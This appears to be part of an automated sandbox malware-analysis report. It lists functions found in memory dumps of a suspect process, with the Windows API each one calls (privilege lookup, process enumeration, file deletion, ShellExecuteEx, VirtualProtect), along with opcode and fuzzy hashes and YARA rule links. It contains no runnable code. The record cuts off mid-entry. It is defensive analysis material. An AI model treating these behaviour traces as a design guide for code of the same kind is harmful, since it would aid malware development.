Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: c1efddec298541d3830831decd3b4e7905032c1e0d961065e7c2a97d5fd7cf14
Instruction ID: 486cb7a1f8567abc63ef98365e37ce860c592e6b50ffac35728edc1a94c311b5
Opcode Fuzzy Hash: c1efddec298541d3830831decd3b4e7905032c1e0d961065e7c2a97d5fd7cf14
Instruction Fuzzy Hash: 48113071A003409BEB20DF69D885BA6FBD9EB15650F08846BDD09CB742DA75D844CA61

Uniqueness

Uniqueness Score: -1.00%

Function 006D03BE, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 006D0406

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c1efddec298541d3830831decd3b4e7905032c1e0d961065e7c2a97d5fd7cf14
Instruction ID: 29dc496b9d88b88db97c06a5c8bc4d4885e9b3aeba8119d7e8792a95722c0d19
Opcode Fuzzy Hash: c1efddec298541d3830831decd3b4e7905032c1e0d961065e7c2a97d5fd7cf14
Instruction Fuzzy Hash: 50116171A04741DFEB60CF25DC85B96FBD8EF14720F08846ADE09CB742D671E804CA61

Uniqueness

Uniqueness Score: -1.00%

Function 006D19BA, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000E40,572F4E5B,00000000,00000000,00000000,00000000), ref: 006D1A0D

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 440b889f2cb4b523c5034c6dbc1092b38e72f8bad2ce01f4a20e81475f374ec9
Instruction ID: c2657d30c3870bcf83f915f883200b829cea5d190cc0e562da300fece1951142
Opcode Fuzzy Hash: 440b889f2cb4b523c5034c6dbc1092b38e72f8bad2ce01f4a20e81475f374ec9
Instruction Fuzzy Hash: 3401D275501300EFFB20DF01DC85BA6FB98DF05720F188097EE099F381C6B4A9058AB1

Uniqueness

Uniqueness Score: -1.00%

Function 0013A23C, Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNEL32(?,572F4E5B,00000000), ref: 0013A298

Memory Dump Source

Source File: 00000004.00000002.2193365081.000000000013A000.00000040.00000001.sdmp, Offset: 0013A000, based on PE: false

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: 9796f29c47939687c2e1b065b8aa47f210fecb5a43a6ab92ef65ae0d1e7c899b
Instruction ID: 091c107aa33bb1de6f30ea9a3aa26054ee11b365c61a2a24ef3485e0d2b690c4
Opcode Fuzzy Hash: 9796f29c47939687c2e1b065b8aa47f210fecb5a43a6ab92ef65ae0d1e7c899b
Instruction Fuzzy Hash: C2116171504784AFD721CF15DC85B62FFA8EF46620F08809AFD899B252D375A908CB72

Uniqueness

Uniqueness Score: -1.00%

Function 006D093A, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,?,?), ref: 006D097A

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 7655da914fa2abe70d9f8e009dac732e65a36755e69029480c6659681bdb7d44
Instruction ID: 4ad16719d305c6cfce27ee9b957db3fca76e0af247a04fae0beaf675992a5350
Opcode Fuzzy Hash: 7655da914fa2abe70d9f8e009dac732e65a36755e69029480c6659681bdb7d44
Instruction Fuzzy Hash: 32116D76A003409FFB20CF65D885BA6FBE4EF14720F0884AADD49CB752D671E804CB61

Uniqueness

Uniqueness Score: -1.00%

Function 006D114E, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(?,?,572F4E5B,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 006D118B

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c27bd5dee6ab49ef7b96c9783b1269ef2c542802880ce9bb7ef3215b35cdef2f
Instruction ID: f6690f6b6ad0f13f98708b9ae95f4df70b4a458e830b6c61aeeed57de53d5bcd
Opcode Fuzzy Hash: c27bd5dee6ab49ef7b96c9783b1269ef2c542802880ce9bb7ef3215b35cdef2f
Instruction Fuzzy Hash: C9014075904340AFEB10CF15DC85796FBD5EF06620F0884AADE09CB742D6B5D944CA61

Uniqueness

Uniqueness Score: -1.00%

Function 006D1DE2, Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,572F4E5B,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 006D1E1C

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 43a6761717c9d432066e3584beb70be6a2311e39080ef071bcb6966c47fc1597
Instruction ID: c89a96f83758e7e61dd28dab181ea3abd4f42f9ea2c5fa602dc30200d746c663
Opcode Fuzzy Hash: 43a6761717c9d432066e3584beb70be6a2311e39080ef071bcb6966c47fc1597
Instruction Fuzzy Hash: D8015E75A04740DFEB20CF25D8857A6FB98EF15721F0884AADD09CF742D6B5E844CA61

Uniqueness

Uniqueness Score: -1.00%

Function 006D1C06, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 006D1C40

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: caa0d664a76f8a15b96cbf3cd49638bbfc44c36f9fe6fade3e97587f4d392db4
Instruction ID: f9055a3f5cbab9a60134309158d018a5721d81980f2e33244688088887c0f153
Opcode Fuzzy Hash: caa0d664a76f8a15b96cbf3cd49638bbfc44c36f9fe6fade3e97587f4d392db4
Instruction Fuzzy Hash: C6018075910244DFEB10CF55D8857A6FB98EF01760F0884ABDD09CF342D6B9E844CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0013B49E, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 0013B4E9

Memory Dump Source

Source File: 00000004.00000002.2193365081.000000000013A000.00000040.00000001.sdmp, Offset: 0013A000, based on PE: false

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: bf6e367561521a1dd18864218a054c617e24c3fc1c4564d7f2225147be3a200a
Instruction ID: bd8f681169db4d18e77279e4f118b8a26002f1111796a4b7e0d30057d4affd18
Opcode Fuzzy Hash: bf6e367561521a1dd18864218a054c617e24c3fc1c4564d7f2225147be3a200a
Instruction Fuzzy Hash: 1B015E71504744DFEB20DF16D885B22FBE4EF14720F088499DE4A8B752E371E908DA72

Uniqueness

Uniqueness Score: -1.00%

Function 0013A5D6, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0013A61A

Memory Dump Source

Source File: 00000004.00000002.2193365081.000000000013A000.00000040.00000001.sdmp, Offset: 0013A000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ef02e3f0057906314e7b023b3cc7550b4228109c5b86549e95797c629ab89bde
Instruction ID: eb202fc6feb18932555cb9b9196f3a69649b841348f19b4c230a1a6a75bb0aa4
Opcode Fuzzy Hash: ef02e3f0057906314e7b023b3cc7550b4228109c5b86549e95797c629ab89bde
Instruction Fuzzy Hash: 2E016972400740DFEB218F55D885B52FFE0EF18720F08C9AAEE898A652C376A414DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0013B3F2, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

AddAtomW.KERNEL32(?), ref: 0013B42C

Memory Dump Source

Source File: 00000004.00000002.2193365081.000000000013A000.00000040.00000001.sdmp, Offset: 0013A000, based on PE: false

Similarity

API ID: Atom
String ID:
API String ID: 2154973765-0
Opcode ID: a23e5a678282b6baf6e8bba4a17dc67f456669dad4991404e00e5915923ff474
Instruction ID: b5914629f6ec7e298c136fbe8f6301e37ab9dde38c6c0574f2c40743c8229d1f
Opcode Fuzzy Hash: a23e5a678282b6baf6e8bba4a17dc67f456669dad4991404e00e5915923ff474
Instruction Fuzzy Hash: 87017C71904740DFEB20DF15D8C57A2FB94EF00721F0884AADE4A8B242E775E804CA66

Uniqueness

Uniqueness Score: -1.00%

Function 0013B0BE, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SetConsoleCtrlHandler.KERNEL32(?,00000E40,?,?), ref: 0013B10E

Memory Dump Source

Source File: 00000004.00000002.2193365081.000000000013A000.00000040.00000001.sdmp, Offset: 0013A000, based on PE: false

Similarity

API ID: ConsoleCtrlHandler
String ID:
API String ID: 1513847179-0
Opcode ID: d8758e4e400523076ec6f40c7b51633b4b6de2967cf823437e5472c55e6666ce
Instruction ID: 2984c662779ffc4cc60f78c4274279c0b284560b8fbc6113ff3d40d3783555c8
Opcode Fuzzy Hash: d8758e4e400523076ec6f40c7b51633b4b6de2967cf823437e5472c55e6666ce
Instruction Fuzzy Hash: 7E016271900600ABD310DF16DD46B26FBB4FB88A20F148159ED085B741D275F515CAE6

Uniqueness

Uniqueness Score: -1.00%

Function 006D236A, Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 006D23A5

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 8b9ebbc5cf5974d20e4784273ce9f238e101514cabd575bc02beea357375d924
Instruction ID: e7b8951feccd9c0215a9a3d0256b276b538a7b68005cdd7ad479fbcbe92d1290
Opcode Fuzzy Hash: 8b9ebbc5cf5974d20e4784273ce9f238e101514cabd575bc02beea357375d924
Instruction Fuzzy Hash: 4F01DF36900740DFEB208F15D885B66FBA0EF14320F08C0AEDE498B752C2B5E858DB62

Uniqueness

Uniqueness Score: -1.00%

Function 006D02EA, Relevance: 1.5, APIs: 1, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?,572F4E5B,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 006D0325

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 93874b06ec7485ddc9f5a9ccebf9a34a3f766304a6b15a58c02eb65a609f301b
Instruction ID: 2f1b3884169e478a4ee9855c2fe57ca793f556c7e97d2b07390292f7570bf37d
Opcode Fuzzy Hash: 93874b06ec7485ddc9f5a9ccebf9a34a3f766304a6b15a58c02eb65a609f301b
Instruction Fuzzy Hash: 0B018435900741DFEB208F15D885B65FBA5EF04721F08C4AADD594B761D271E418DB62

Uniqueness

Uniqueness Score: -1.00%

Function 006D21EA, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 006D221C

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: DestroyWindow
String ID:
API String ID: 3375834691-0
Opcode ID: da4844184a26416ef90743ae5710b7ce10bae718292b89807183902b165a4181
Instruction ID: 016f2eb024525eb8df1d8d27b0c54891e0d123a60dffbe19f03a3c701226436b
Opcode Fuzzy Hash: da4844184a26416ef90743ae5710b7ce10bae718292b89807183902b165a4181
Instruction Fuzzy Hash: 1001D135900741CFEB208F15D885B62FBA0EF65720F08C0ABED098B752C275E948DA62

Uniqueness

Uniqueness Score: -1.00%

Function 0013A25E, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNEL32(?,572F4E5B,00000000), ref: 0013A298

Memory Dump Source

Source File: 00000004.00000002.2193365081.000000000013A000.00000040.00000001.sdmp, Offset: 0013A000, based on PE: false

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: c0aa5edbf464db0377019f014df06dc0276746335f33846d8f9cc9710a08a424
Instruction ID: fccdcd3473c0fa329c1b7d2a70e17cedd5d94c363a89d7c5fa5f275833e0decb
Opcode Fuzzy Hash: c0aa5edbf464db0377019f014df06dc0276746335f33846d8f9cc9710a08a424
Instruction Fuzzy Hash: 9701A435500B40DFEB20DF15D885B66FB94EF05721F48C09ADD498B356D776E804CB62

Uniqueness

Uniqueness Score: -1.00%

Function 006D1FE2, Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 006D201D

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: c33b87465995698df27ae735dcfc9c2535d84a3f4bdcd47037433d0e3dd59c72
Instruction ID: e60a213b5164085c657e91257a3b176044839bd6523b0f8c02302edd8f4cfdfd
Opcode Fuzzy Hash: c33b87465995698df27ae735dcfc9c2535d84a3f4bdcd47037433d0e3dd59c72
Instruction Fuzzy Hash: AF01AD31900740DFEB218F45D885B61FBA1EF28720F08C4AADE494B722C376A858DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0013A69A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,572F4E5B,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 0013A6CC

Memory Dump Source

Source File: 00000004.00000002.2193365081.000000000013A000.00000040.00000001.sdmp, Offset: 0013A000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 0b1dac0fd9c1cc33ffc4554e11b346fa56fe7a011942db08434b26a1e80d1a43
Instruction ID: 32691b1d13fe4356e6edebf111ab037aa65d5723b407a8a31234657bd68a6d7b
Opcode Fuzzy Hash: 0b1dac0fd9c1cc33ffc4554e11b346fa56fe7a011942db08434b26a1e80d1a43
Instruction Fuzzy Hash: B4F0C275500740DFEB20DF05D886761FBA4EF04721F4CC09ADD494B352D379A948DAA2

Uniqueness

Uniqueness Score: -1.00%

Function 002E05A8, Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

:@lq, xrefs: 002E06D4

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: :@lq
API String ID: 0-537014040
Opcode ID: c142a8c44df366cac5aac4ccd032d7ba2d31bf9ba7ae69c2652b6071ed2234f0
Instruction ID: b6177ed19de6e0e78f6fcd5abe0826d44d0584fef7a8326758595a90835b5647
Opcode Fuzzy Hash: c142a8c44df366cac5aac4ccd032d7ba2d31bf9ba7ae69c2652b6071ed2234f0
Instruction Fuzzy Hash: E991D374E11258CFEB14DFA9C994BADBBF1BF89314F204069E409AB361DB70A981CF15

Uniqueness

Uniqueness Score: -1.00%

Function 002E0598, Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

:@lq, xrefs: 002E06D4

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: :@lq
API String ID: 0-537014040
Opcode ID: 8130baec767466e1f02e8a28593998912078cd74883da4bcc57c6cde77a3c1e4
Instruction ID: 497800051c67c50c4919c140bb3d86a4da6b4a399d538fa387c1ac1e1a04964b
Opcode Fuzzy Hash: 8130baec767466e1f02e8a28593998912078cd74883da4bcc57c6cde77a3c1e4
Instruction Fuzzy Hash: 91710574D11258CFEB14DFA9C994BADBBF1BF49314F2040A9E409AB361DBB09981CF11

Uniqueness

Uniqueness Score: -1.00%

Function 006D09C3, Relevance: 1.3, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 006D0A30

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: c6fd27f4a563b435d76bdcc2f27eb53ed2ad1075132169212c40ed91396b8fdd
Instruction ID: c3c69455bc7a5e38f6ea9acbbd07fcb728af84ac612fe401ccdd25f41505f006
Opcode Fuzzy Hash: c6fd27f4a563b435d76bdcc2f27eb53ed2ad1075132169212c40ed91396b8fdd
Instruction Fuzzy Hash: 55218B7550E3C09FE7138B259C55691BFB4EF03224F0D80DBD9848F2A3D2659909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 006D05D4, Relevance: 1.3, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 006D0640

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 789526e3767fa40b4720fe08f60f083ecbcc8a1ae6f324a8f465263a671760a1
Instruction ID: ead92506a03ed467c0d65ed9a3cffbfae5b7a1b9a32456f759674e3f381208ea
Opcode Fuzzy Hash: 789526e3767fa40b4720fe08f60f083ecbcc8a1ae6f324a8f465263a671760a1
Instruction Fuzzy Hash: 1721D4715093C05FEB12CB25DC55792BFA4AF43324F0980DBD8858F663D2659908C761

Uniqueness

Uniqueness Score: -1.00%

Function 00250AAC, Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

[N/W, xrefs: 00250B11, 00250B15

Memory Dump Source

Source File: 00000004.00000002.2193503576.0000000000250000.00000040.00000040.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID: [N/W
API String ID: 0-2690583375
Opcode ID: 03aaea4898f31a15964665a2b77c383a807aeda85fefa94da63eb4bd338292a8
Instruction ID: 18a684ec6c1fdcb61c913fa23e2fec61310ae3c3119244b4bb48bb215d9e235b
Opcode Fuzzy Hash: 03aaea4898f31a15964665a2b77c383a807aeda85fefa94da63eb4bd338292a8
Instruction Fuzzy Hash: 39112EB2504204AFD210CE45DC85D67F7E8EF84725F14C929FD498B201D332ED158AA6

Uniqueness

Uniqueness Score: -1.00%

Function 0013A2D6, Relevance: 1.3, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 0013A32C

Memory Dump Source

Source File: 00000004.00000002.2193365081.000000000013A000.00000040.00000001.sdmp, Offset: 0013A000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: e5a6a8627d427d397d2f06d9821f92bf0dbe0ea6deeb2d18320f8f187eb827e1
Instruction ID: 347dc7b33e0de25495a5b14eb077540f7739fa79133a95c3cc4cd4b57e3a356e
Opcode Fuzzy Hash: e5a6a8627d427d397d2f06d9821f92bf0dbe0ea6deeb2d18320f8f187eb827e1
Instruction Fuzzy Hash: CA1191715093C09FDB128F25DC95B92BFA4EF02320F0884EBED858B653D275A808CB62

Uniqueness

Uniqueness Score: -1.00%

Function 002E8A78, Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

5*DH, xrefs: 002E8AA4

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: 5*DH
API String ID: 0-1064916762
Opcode ID: 102c4d8f908fce49ac5bc37ec9470e1e92417bbd8d127b93e99eb6f56dbe6426
Instruction ID: 4343eb7eef46cdcc8476a94abf0ca94b23ed40071663989162e395dc3348649d
Opcode Fuzzy Hash: 102c4d8f908fce49ac5bc37ec9470e1e92417bbd8d127b93e99eb6f56dbe6426
Instruction Fuzzy Hash: FB111434A51248EFDB04DFA9D584A9DFBF1EF89300F65C0AAD419AB261DB309A10CB00

Uniqueness

Uniqueness Score: -1.00%

Function 006D060E, Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 006D0640

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 14c1c8c44fd67a05d9899c0a154cbb4b912c7033c25185ae0f689dad0b0b1b4c
Instruction ID: 1784c5f6ef30fd4aa211ea70d87443aed2161149028b696281a5aab5d944cd60
Opcode Fuzzy Hash: 14c1c8c44fd67a05d9899c0a154cbb4b912c7033c25185ae0f689dad0b0b1b4c
Instruction Fuzzy Hash: 8E01DF75900780CFEB10CF15D885792FBA4EF41720F08C0ABDD098B742C271E814DA62

Uniqueness

Uniqueness Score: -1.00%

Function 0013A2FA, Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 0013A32C

Memory Dump Source

Source File: 00000004.00000002.2193365081.000000000013A000.00000040.00000001.sdmp, Offset: 0013A000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: b92c01c48a931e3f39c6aadf093eb9c501dde6daa15c53a5a0e9ce615b227997
Instruction ID: 8a07b269d16a84c079ba4fc1a7295b01781b1f3df1e92a921862faf3ed6d7960
Opcode Fuzzy Hash: b92c01c48a931e3f39c6aadf093eb9c501dde6daa15c53a5a0e9ce615b227997
Instruction Fuzzy Hash: A101AD75A04340DFEB20CF19DC897A6FBA4EF00720F48C4AADD498B652D775A804CA62

Uniqueness

Uniqueness Score: -1.00%

Function 006D09FE, Relevance: 1.3, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 006D0A30

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 88bf4a3e31992edd759ca7a56b31d97d684d2c5b4d68260517a7ad388108ff08
Instruction ID: 5f55231652dc245f1d62da5150752f440c70ec068697c07896f5abf534b5b0ef
Opcode Fuzzy Hash: 88bf4a3e31992edd759ca7a56b31d97d684d2c5b4d68260517a7ad388108ff08
Instruction Fuzzy Hash: 5E01A435900740DFEB208F16D8857A5FBA4EF05721F0CC0ABDD098B752D675E944DAA2

Uniqueness

Uniqueness Score: -1.00%

Function 00250AEE, Relevance: 1.3, Strings: 1, Instructions: 34COMMON

Download Yara Rule

Strings

[N/W, xrefs: 00250B11, 00250B15

Memory Dump Source

Source File: 00000004.00000002.2193503576.0000000000250000.00000040.00000040.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID: [N/W
API String ID: 0-2690583375
Opcode ID: 70ce730723999018c451bfe9c4a8930b1fd34b3f5dec1b2397413995e671317b
Instruction ID: 28397b72b2ead200d042626e3231ba06eb1859dac6756f3db2aefc0543ef1fc6
Opcode Fuzzy Hash: 70ce730723999018c451bfe9c4a8930b1fd34b3f5dec1b2397413995e671317b
Instruction Fuzzy Hash: D4F082B28052046FD300DF05EC42856F7ACDFC4921F08C53AED088B701E276AA144AF2

Uniqueness

Uniqueness Score: -1.00%

Function 002EBFA8, Relevance: 1.3, Strings: 1, Instructions: 19COMMON

Download Yara Rule

Strings

<, xrefs: 002EBFCE

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: <
API String ID: 0-4251816714
Opcode ID: e319dd4083fd3628711894554bf8b06bf9a98818ad37baa8cbf3540582c822f3
Instruction ID: 2a6b218f67e22d94ff74c4131d1504041ea51cc399c03e33798926264c60d1c0
Opcode Fuzzy Hash: e319dd4083fd3628711894554bf8b06bf9a98818ad37baa8cbf3540582c822f3
Instruction Fuzzy Hash: 12F0B2B8D51269CFCB21CF26EE59BA9BBB0BB59311F5084D9C44AB7620D3B11AC0CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002E4BD0, Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8aef0458379745dffafc818b22faa76c7912e5fbeb8cb600eeb2047a6f5f59f
Instruction ID: d6804ecd9d8a737a6ab3f16fb73f1a36d6d34082f24dc4eb88084449f2d03568
Opcode Fuzzy Hash: b8aef0458379745dffafc818b22faa76c7912e5fbeb8cb600eeb2047a6f5f59f
Instruction Fuzzy Hash: D26136B4D55248CFCB04EFA6D884AADBBB2FF49300F20906AD805AB361DB349D95CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E4C28, Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 136aca225d276d142dfa63e26978f2961dc8073d021f09b6644b254d09e185ae
Instruction ID: a7ae39b3a8adf618e4113614c348c87964c3009614ede2577404ad96af35b567
Opcode Fuzzy Hash: 136aca225d276d142dfa63e26978f2961dc8073d021f09b6644b254d09e185ae
Instruction Fuzzy Hash: 4851D3B4D55248DFCB04EFAAD884AADBBF2BF89300F60906AD805B7360D7745991CF14

Uniqueness

Uniqueness Score: -1.00%

Function 002E0280, Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 257a893a56e5e66d9b578b95f06bcfc785be5047e99c304fc13dedefc0cd1153
Instruction ID: b7dfe3232158704591f9ce97d24d2223a887e55911be54f60790151591663bdf
Opcode Fuzzy Hash: 257a893a56e5e66d9b578b95f06bcfc785be5047e99c304fc13dedefc0cd1153
Instruction Fuzzy Hash: 8A41BB78A10209DFDB14CFA9C984BADBBF1AB4D310F1044A5E602AB360C774A995DF61

Uniqueness

Uniqueness Score: -1.00%

Function 002EEA60, Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f36d96ff37e4071d01b782075f335caa335b67cd7732c3a1dff581f715f36781
Instruction ID: f0f123b9c8627cb12492b3644970ace9c2030c729cf6e358474203ad5527218a
Opcode Fuzzy Hash: f36d96ff37e4071d01b782075f335caa335b67cd7732c3a1dff581f715f36781
Instruction Fuzzy Hash: E941DD75D116498FCF14DFA9C8805DDFBB5FF89304F20862AD42AAB220EB706995CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0014AF28, Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193377738.0000000000142000.00000040.00000001.sdmp, Offset: 00142000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 671dd352916f6de1f5ad54634659d46153f3b0c8dbdc28038803eeae5da7553f
Instruction ID: a761d8608139e8f8aec3e433be6033e231f8c51d3326d0fa5c7071c1ed8813a5
Opcode Fuzzy Hash: 671dd352916f6de1f5ad54634659d46153f3b0c8dbdc28038803eeae5da7553f
Instruction Fuzzy Hash: 103180B6508340AFD710CF05EC41E57FFE8EB85A60F08C95EFD5997252D276A9048BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00B72CB8, Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b553bde8dc1fc563122a182118d869d887658a364364ef735f94475d69214722
Instruction ID: eced07b602d4badd5ed88fbcce5bca489fd66d4c97269b0305fb2869467e7c77
Opcode Fuzzy Hash: b553bde8dc1fc563122a182118d869d887658a364364ef735f94475d69214722
Instruction Fuzzy Hash: 35315870D16208DFCB10DFA8D9815EDFBF4FB4E350F20A86AD02AFA210D33599418B68

Uniqueness

Uniqueness Score: -1.00%

Function 0014A98C, Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193377738.0000000000142000.00000040.00000001.sdmp, Offset: 00142000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34bf5b1490e4cd5290dc409cfdbfed91b511b8c23444197d48e69c9129506dc0
Instruction ID: f1202b1f569e22232dc1f3da401afb7b7abe12174d11d60937821df4fdb4f327
